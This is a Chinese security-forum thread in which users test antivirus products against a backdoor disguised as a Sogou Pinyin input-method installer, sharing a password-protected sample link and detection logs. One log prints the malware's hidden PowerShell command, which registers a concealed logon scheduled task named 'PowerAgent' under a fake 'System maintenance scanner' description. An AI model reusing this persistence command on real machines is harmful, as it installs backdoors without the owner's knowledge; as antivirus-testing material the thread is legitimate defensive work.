fake搜狗输入法（过静态扫描）进化版 vt:0/55

显示全部楼层 · 发表于前天 20:43

本帖最后由 ulyanov2233 于 2025-7-16 21:00 编辑

https://www.virustotal.com/gui/f ... 3990e1170?nocache=1
【sogoupinyin_2.15.6_install】
链接：https://qfile.qq.com/q/zst7zcTeO4 密码都是:infected
卡巴云拉黑衍生物
我的评价是你有这心思过静态不如想个新思路过下主防，你这病毒动静太大，但凡有点主防的杀软很难不发现。。。。

显示全部楼层 · 发表于前天 20:58

emsi双击

2025/7/16 20:57:30
行为监控检测可疑行为 "HiddenInstallation" 来自于 C:\Program Files (x86)\sogoupinyin_2.15.6_install\sogoupinyin_2.15.6_install\sogou_pinyin_guanwang_15.6.exe (SHA1: 2D0B28D5DE4FCE4D40B7E1EACC5916863AE2BF00)

复制代码

显示全部楼层 · 发表于前天 21:00

这个还是你之前发的那个吧？

显示全部楼层 · 发表于前天 21:01

反病毒fileman 发表于 2025-7-16 21:00
这个还是你之前发的那个吧？

从行为上看是同源的，但是这家银狐又想办法过了静态扫描

显示全部楼层 · 发表于前天 21:05

火绒
运行：多步主防捉

防护项目：浏览器
操作目标：【执行】 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
操作目标参数：powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { $existingTask = Get-ScheduledTask -TaskName "PowerAgent" -ErrorAction SilentlyContinue; if ($existingTask) { Unregister-ScheduledTask -TaskName "PowerAgent" -Confirm:$false }; $a = New-ScheduledTaskAction -Execute "C:\\Program Files (x86)\\sogoupinyin_2.15.6_install\\sogoupinyin_2.15.6_install\\Windows Startup Applications\\chrome.exe" -WorkingDirectory "C:\\Program Files (x86)\\sogoupinyin_2.15.6_install\\sogoupinyin_2.15.6_install\\Windows Startup Applications"; $tr = New-ScheduledTaskTrigger -AtLogon -User $env:USERNAME; $p = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; $s = New-ScheduledTaskSettingsSet -Hidden -StartWhenAvailable -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit (New-TimeSpan -Hours 0); $task = New-ScheduledTask -Action $a -Trigger $tr -Principal $p -Settings $s -Description "System maintenance scanner"; Register-ScheduledTask -TaskName "PowerAgent" -In
操作结果：已允许

复制代码

防护项目：隐藏执行PowerShell
执行文件：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { $existingTask = Get-ScheduledTask -TaskName "PowerAgent" -ErrorAction SilentlyContinue; if ($existingTask) { Unregister-ScheduledTask -TaskName "PowerAgent" -Confirm:$false }; $a = New-ScheduledTaskAction -Execute "C:\\Program Files (x86)\\sogoupinyin_2.15.6_install\\sogoupinyin_2.15.6_install\\Windows Startup Applications\\chrome.exe" -WorkingDirectory "C:\\Program Files (x86)\\sogoupinyin_2.15.6_install\\sogoupinyin_2.15.6_install\\Windows Startup Applications"; $tr = New-ScheduledTaskTrigger -AtLogon -User $env:USERNAME; $p = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; $s = New-ScheduledTaskSettingsSet -Hidden -StartWhenAvailable -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit (New-TimeSpan -Hours 0); $task = New-ScheduledTask -Action $a -Trigger $tr -Principal $p -Settings $s -Description "System maintenance scanner"; Register-ScheduledTask -TaskName "PowerAgent" -In
操作结果：已允许

复制代码

防护项目：系统任务目录
目标文件：C:\Windows\System32\Tasks\PowerAgent
操作结果：已允许

复制代码

防护项目：流行病毒
可疑文件：HKEY_LOCAL_MACHINE\SOFTWARE\IpDates_info
操作结果：已阻止
进程ID：8968
操作进程：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

复制代码

病毒名称：Backdoor/Lotok.UC
病毒路径：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

复制代码

显示全部楼层 · 发表于前天 21:05

卡巴右键扫描可杀啊，云入库这么快吗？

显示全部楼层 · 发表于前天 21:07

骚猪发表于 2025-7-16 21:05
卡巴右键扫描可杀啊，云入库这么快吗？

有其他地方的卡巴用户盯得比我还勤，我看到的时候eset和卡巴都云拉黑了dll，但是安装包没被拉黑

2025/7/16 20:45:44;文件系统实时防护;文件;C:\Users\Y8219\Downloads\chrome_elf\chrome_elf.dll;Suspicious Object;已通过删除清除;FIREFLY\Y8219;尝试通过应用程序访问文件时发生事件: C:\Windows\explorer.exe (D71741A8A93214B83AABF262CD725C818079C1B0).;CF7BF82C4CB30C4747C4DCAA0AF0231229847FC0;2025/7/16 20:45:36

显示全部楼层 · 发表于前天 21:37

本帖最后由 tihs 于 2025-7-16 22:10 编辑

12天前的eset

显示全部楼层 · 发表于前天 21:52

本帖最后由心醉咖啡于 2025-7-16 21:57 编辑

360扫描miss

显示全部楼层 · 发表于前天 22:42

本帖最后由 superLYT 于 2025-7-16 22:43 编辑

EIS第一次全程无响应，第二次云拉黑

[病毒样本] fake搜狗输入法（过静态扫描）进化版 vt:0/55

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源